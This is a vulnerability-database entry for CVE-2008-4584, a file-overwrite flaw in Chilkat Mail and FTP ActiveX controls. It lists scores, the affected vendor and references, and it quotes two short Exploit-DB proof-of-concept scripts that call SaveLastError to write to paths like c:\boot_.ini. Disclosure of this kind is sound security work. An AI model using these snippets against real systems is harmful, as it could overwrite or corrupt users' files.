CVE-2008-4584
published 2008-10-15CVE-2008-4584: Insecure method vulnerability in Chilkat Mail 7.8 ActiveX control (ChilkatCert.dll) allows remote attackers to overwrite arbitrary files via a full pathname to…
PriorityP335medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
4.72%
90.7th percentile
Insecure method vulnerability in Chilkat Mail 7.8 ActiveX control (ChilkatCert.dll) allows remote attackers to overwrite arbitrary files via a full pathname to the SaveLastError method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chilkat_software | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Chilkat FTP - ActiveX (SaveLastError) Insecure Method
exploitdb·2008-12-28
CVE-2008-4584 Chilkat FTP - ActiveX (SaveLastError) Insecure Method
Chilkat FTP - ActiveX (SaveLastError) Insecure Method
---
ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2
ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2 Arbitrary Data Write Exploit
function Do_it()
{
File = "c:\\boot_.ini"
ctrl.SaveLastError(File)
}
# milw0rm.com [2008-12-28]
Exploit-DB
Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method
exploitdb·2008-01-29
CVE-2008-4584 Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method
Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method
---
Chilkat Mail
ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit
Site :
www.chilkatsoft.com
Tested on
Windows XP Professional SP2 , with Internet Explorer 6
Author :
darkl0rd
E-Mail :
l_l_darkl0rd_l_l[at]yahoo[dot]com
SaveLastError
Sub lose
mystr="c:\darkl0rd.txt"
over.SaveLastError mystr
MyMsg = MsgBox("Done !")
End Sub
# milw0rm.com [2008-01-29]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4424http://www.securityfocus.com/bid/27493https://exchange.xforce.ibmcloud.com/vulnerabilities/40041https://www.exploit-db.com/exploits/5005http://securityreason.com/securityalert/4424http://www.securityfocus.com/bid/27493https://exchange.xforce.ibmcloud.com/vulnerabilities/40041https://www.exploit-db.com/exploits/5005
2008-10-15
Published